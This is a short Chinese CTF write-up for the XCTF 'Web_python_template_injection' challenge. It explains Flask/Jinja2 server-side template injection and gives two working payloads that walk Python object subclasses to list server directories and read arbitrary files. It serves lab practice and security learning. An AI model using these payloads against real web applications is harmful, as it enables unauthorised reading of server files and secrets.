【XCTF 攻防世界】WEB 高手进阶区 Web_python_template_injection

打开链接
只有一行字
提示这是python模板注入

也就是说可能是jinjia2、djingo、tornado中的一个模板

在这里插入图片描述
这里涉及到flask的ssti漏洞(服务端模板注入)。

简单点说就是,在使用flask/jinja2的模板渲染函数render_template_string的同时,使
用%s来替换字符串的时候,会把字符串中被{{}}包围内容当作变量解析。

举个例子

请求:xxxxxx.xxx/{{ 10*10 }}

响应:xxxxx.xxx/{{100}} Not Found!

原理讲解:
https://www.cnblogs.com/tr1ple/p/9415641.html
https://xz.aliyun.com/t/3679#toc-0

ssti:
https://www.cnblogs.com/R3col/p/12746485.html

总结
这道题只用了下边俩方法:

查看文件(ls)

{{''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].listdir('./')}}这里的./是路径

文件读取:

​ {{''.__class__.__mro__[-1].__subclasses__()[40]('filename').read()}}这里的filename是文件名

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值